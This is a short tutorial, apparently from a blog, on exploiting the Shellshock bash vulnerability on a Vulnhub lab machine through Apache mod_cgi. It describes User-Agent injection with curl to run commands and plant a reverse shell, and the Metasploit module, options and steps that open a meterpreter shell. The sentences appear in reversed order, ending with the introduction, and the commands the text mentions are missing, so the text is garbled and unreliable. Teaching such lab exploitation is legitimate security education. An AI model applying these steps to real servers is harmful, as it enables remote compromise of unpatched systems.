That’s it! I hope you understood the concept of shellshock vulnerability and how to exploit it. Once these options are configured, we can run check to see if the target is vulnerable and then run the exploit.Ī meterpreter session is opened, and now we can type shell which opens a shell on the target machine. In this case it is /cgi-bin/test/test.cgi. Load this module by using use and then you can type show options to see the list of settings that we can change.įor this attack, we need to set the RHOSTS to the IP address of the target machine and TARGETURI to the path where cgi_script is located. We have many exploits available but the one we need is apache mod_cgi exploit. We can easily search for exploits by using the search command. The same goal can also be achieved using Metasploit.
We can store malicious code that sets up a reverse shell inside this environment variable. By default, this is set to HTTP_USER_AGENT = curl/7.47.0when using curl. The User-Agent value used in curl is stored as an environment variable on the remote machine. To check the vulnerability, We need to send a request using curl to the target machine and we can see that we retrieved the “id” of the current user. On running a quick nikto scan, we can see that this machine is vulnerable to the Shellshock Vulnerability. I've also posted a detailed writeup for this machine, you can find it here. For this article, I'll be using a boot2root machine "Sumo:1" from Vulnhub. In this guide, we will be exploiting the mod_cgi module that is part of the Apache HTTP Server.
Shellshock is actually an entire family of vulnerabilities consisting of multiple exploitation vectors. Upon running the above command, an affected version of bash will output “vulnerable”. Therefore, an attacker can execute arbitrary commands on the system or exploit other bugs that may exist in Bash's command interpreter, if the attacker has a way to manipulate the environment variable list. The vulnerability relies on the fact that BASH incorrectly executes trailing commands when it imports a function definition stored into an environment variable. It is a security bug in the Unix Bash shell that causes Bash to execute bash commands from environment variables unintentionally. Nowadays, you will find this vulnerability in many CTF Challenges, so this article can help you to find a way by exploiting this vulnerability. It affected most versions of Linux and UNIX-based OSes. Shellshock is still a very real threat, especially for unpatched systems. One of the most critical bugs that came out in the last decade was Shellshock, a vulnerability which allows attackers to execute arbitrary code via Unix Bash shell remotely.